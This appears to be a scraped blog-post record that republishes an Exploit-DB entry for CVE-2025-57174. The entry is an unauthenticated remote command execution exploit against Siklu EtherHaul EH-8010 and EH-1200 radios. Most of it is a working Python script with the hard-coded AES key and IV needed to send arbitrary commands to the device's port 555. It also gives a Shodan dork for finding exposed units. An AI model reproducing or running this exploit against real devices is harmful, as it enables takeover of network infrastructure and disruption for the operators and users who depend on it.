{“lastseen”:”2026-01-17T15:28:01″,”description”:”Exploit Title:Siklu EtherHaul Series EH-8010 – Remote Command Execution Shodan Dork: \\”EH-8010\\” or \\”EH-1200\\” Date: 2025-08-02 Exploit Author: semaja2 – Andrew James Vendor Homepage: https:\/\/www.ceragon.com\/products\/siklu-by-ceragon Software Link:…”,”published”:”2026-01-17T00:00:00″,”modified”:”2026-01-17T00:00:00″,”type”:”exploitdb”,”title”:”Siklu EtherHaul Series EH-8010 – Remote Command Execution”,”source”:””,”references”:””,”id”:”EDB-ID:52466″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-57174″],”sourceData”:”# Exploit Title:Siklu EtherHaul Series EH-8010 – Remote Command Execution\\r\\n# Shodan Dork: \\”EH-8010\\” or \\”EH-1200\\”\\r\\n# Date: 2025-08-02\\r\\n# Exploit Author: semaja2 – Andrew James \\u003csemaja2@gmail.com\\u003e\\r\\n# Vendor Homepage: https:\/\/www.ceragon.com\/products\/siklu-by-ceragon\\r\\n# Software Link: ftp:\/\/ftp.bubakov.net\/siklu\/\\r\\n# Version: EH-8010 and EH-1200 Firmware 7.4.0 – 10.7.3\\r\\n# Tested on: Linux\\r\\n# CVE: CVE-2025-57174\\r\\n# Blog: https:\/\/semaja2.net\/2025\/08\/02\/siklu-eh-unauthenticated-rce\/\\r\\n\\r\\n#!\/usr\/bin\/env python3\\r\\nimport argparse, socket, struct\\r\\nfrom Crypto.Cipher import AES\\r\\n\\r\\nPORT = 555\\r\\nHDR_LEN = 0x90\\r\\nIV0 = struct.pack(‘\\u003c4I’, 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72)\\r\\nKEY = bytes([\\r\\n 0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5,\\r\\n 0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17,\\r\\n 0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0,\\r\\n 0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82\\r\\n])\\r\\n\\r\\ndef recv_exact(sock: socket.socket, n: int) -\\u003e bytes:\\r\\n out = bytearray()\\r\\n while len(out) \\u003c n:\\r\\n chunk = sock.recv(n – len(out))\\r\\n if not chunk:\\r\\n raise ConnectionError(‘socket closed’)\\r\\n out += chunk\\r\\n return bytes(out)\\r\\n\\r\\ndef pad16_zero(b: bytes) -\\u003e bytes:\\r\\n r = len(b) \\u0026 0x0F\\r\\n return b if r == 0 else (b + b’\\\\x00′ * (16 – r))\\r\\n\\r\\ndef hdr_checksum(hdr: bytes) -\\u003e int:\\r\\n return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) \\u0026 0xFFFFFFFF\\r\\n\\r\\ndef build_header(flag: int, msg: int, payload_len: int) -\\u003e bytes:\\r\\n hdr = bytearray(HDR_LEN)\\r\\n hdr[0] = flag \\u0026 0xFF\\r\\n hdr[1] = msg \\u0026 0xFF\\r\\n struct.pack_into(‘\\u003cI’, hdr, 0x08, payload_len \\u0026 0xFFFFFFFF)\\r\\n struct.pack_into(‘\\u003cI’, hdr, 0x0C, hdr_checksum(hdr))\\r\\n return bytes(hdr)\\r\\n\\r\\nclass RFPipeSession:\\r\\n def __init__(self, key: bytes, iv0: bytes):\\r\\n self.key = key\\r\\n self.send_iv = iv0\\r\\n self.recv_iv = iv0\\r\\n def enc_send(self, sock: socket.socket, data: bytes) -\\u003e None:\\r\\n cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv)\\r\\n ct = cipher.encrypt(data)\\r\\n self.send_iv = ct[-16:]\\r\\n sock.sendall(ct)\\r\\n def dec_recv(self, sock: socket.socket, n_plain: int) -\\u003e bytes:\\r\\n if n_plain \\u003c= 0:\\r\\n return b”\\r\\n n_padded = (n_plain + 15) \\u0026 ~15\\r\\n ct = recv_exact(sock, n_padded)\\r\\n cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)\\r\\n pt = cipher.decrypt(ct)\\r\\n self.recv_iv = ct[-16:]\\r\\n return pt[:n_plain]\\r\\n def send_header(self, sock: socket.socket, hdr_plain: bytes) -\\u003e None:\\r\\n if len(hdr_plain) != HDR_LEN:\\r\\n raise ValueError(‘header must be 0x90 bytes’)\\r\\n self.enc_send(sock, hdr_plain)\\r\\n def recv_header(self, sock: socket.socket) -\\u003e bytes:\\r\\n ct = recv_exact(sock, HDR_LEN)\\r\\n cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv)\\r\\n pt = cipher.decrypt(ct)\\r\\n self.recv_iv = ct[-16:]\\r\\n return pt\\r\\n\\r\\ndef connect_any(host: str, port: int) -\\u003e socket.socket:\\r\\n infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM)\\r\\n last_err = None\\r\\n for fam, st, proto, _, sa in infos:\\r\\n s = socket.socket(fam, st, proto)\\r\\n try:\\r\\n s.connect(sa)\\r\\n return s\\r\\n except Exception as e:\\r\\n last_err = e\\r\\n s.close()\\r\\n raise ConnectionError(f’connect failed: {last_err}’)\\r\\n\\r\\ndef main():\\r\\n ap = argparse.ArgumentParser(description=’rfpiped command client (msg 0x01)’)\\r\\n ap.add_argument(‘target’, help=’IPv4\/IPv6 address’)\\r\\n ap.add_argument(‘command’, help=’command string (e.g., \\”mo-info system\\”)’)\\r\\n ap.add_argument(‘–nul’, action=’store_true’, help=’append NUL terminator to command’)\\r\\n ap.add_argument(‘–recv’, action=’store_true’, help=’receive and print response’)\\r\\n args = ap.parse_args()\\r\\n\\r\\n payload = args.command.encode(‘utf-8’)\\r\\n if args.nul:\\r\\n payload += b’\\\\x00’\\r\\n\\r\\n hdr_plain = build_header(flag=0x00, msg=0x01, payload_len=len(payload))\\r\\n sess = RFPipeSession(KEY, IV0)\\r\\n\\r\\n with connect_any(args.target, PORT) as s:\\r\\n sess.send_header(s, hdr_plain)\\r\\n if payload:\\r\\n sess.enc_send(s, pad16_zero(payload))\\r\\n if args.recv:\\r\\n rh = sess.recv_header(s)\\r\\n flag = rh[0]; rmsg = rh[1]\\r\\n rlen = struct.unpack_from(‘\\u003cI’, rh, 0x08)[0]\\r\\n print(f’Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}’)\\r\\n if rmsg in (0x03, 0x05):\\r\\n return\\r\\n if rlen:\\r\\n body = sess.dec_recv(s, rlen)\\r\\n if body.endswith(b’\\\\x00′):\\r\\n body = body[:-1]\\r\\n try:\\r\\n print(body.decode(‘utf-8′, errors=’replace’))\\r\\n except Exception:\\r\\n print(body.hex())\\r\\n\\r\\nif __name__ == ‘__main__’:\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52466″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52466″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-17T15:28:01″,”description”:”Exploit Title:Siklu EtherHaul Series EH-8010 – Remote Command Execution Shodan Dork: \\”EH-8010\\” or \\”EH-1200\\” Date: 2025-08-02 Exploit Author: semaja2 – Andrew James Vendor Homepage: https:\/\/www.ceragon.com\/products\/siklu-by-ceragon…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-36164","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n